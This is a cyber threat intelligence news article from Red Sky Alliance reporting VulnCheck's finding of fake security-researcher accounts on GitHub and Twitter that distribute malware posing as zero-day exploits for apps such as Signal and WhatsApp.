Exploit and vulnerability intelligence provider VulnCheck https://vulncheck.com has issued a warning over fake security researcher accounts distributing malware disguised as zero-day exploits for popular software. The campaign was discovered in early May 2023, when researchers found a GitHub repository hosting code that its author claimed to be a zero-day for the Signal messaging application. The cybersecurity firm continued finding such accounts on GitHub, offering what they claimed to be zero-day exploits for applications such as WhatsApp, Chrome, Discord, and Microsoft Exchange.
Recently, VulnCheck noticed that the campaign’s operator has also started creating Twitter accounts that appear to belong to security researchers and using them to lure people to GitHub repositories hosting the fake zero-day exploits. The fake researcher accounts on Twitter have profile pictures in some cases they are the photos of known researchers, and they claim to be associated with High Sierra Cyber Security, an entity that does not seem to exist. The person in the Twitter profile does not have a LinkedIn profile posted that raises simple concerns about the authenticity of the person.
The code hosted in the GitHub repositories is designed to download a malicious binary and execute it. The downloaded binary can be a Windows or Linux file, depending on the victim’s operating system. A brief analysis of these binaries makes it obvious that they are malware.
The attacker has made a lot of effort to create all these fake personas, only to deliver obvious malware. It is unclear if they have been successful but given that they have continued to pursue this avenue of attacks, it seems they believe they will be successful, researchers said. The GitHub accounts seen by VulnCheck have been suspended, but the fake Twitter accounts are still currently online.
It is unclear if this is a campaign run by a threat actor or if it is part of some sort of experiment, but the cybersecurity community has been advised to act with caution when executing code from untrusted sources.
Sophisticated threat actors targeting security researchers is not new. In 2021, Google warned that North Korean hackers had delivered malware to security researchers after gaining their trust. The NK cyber actors have been busy for years eliciting information from cyber professionals around the world.
See: https://redskyalliance.org/xindustry/no-good-deed-goes-unpunished
This article is presented at no charge for educational and informational purposes only.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225, or feedback@redskyalliance.com
Weekly Cyber Intelligence Briefings:
- Reporting: https://www.redskyalliance.org/
- Website: https://www.redskyalliance.com/
- LinkedIn: https://www.linkedin.com/company/64265941
Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://attendee.gotowebinar.com/register/5504229295967742989
Comments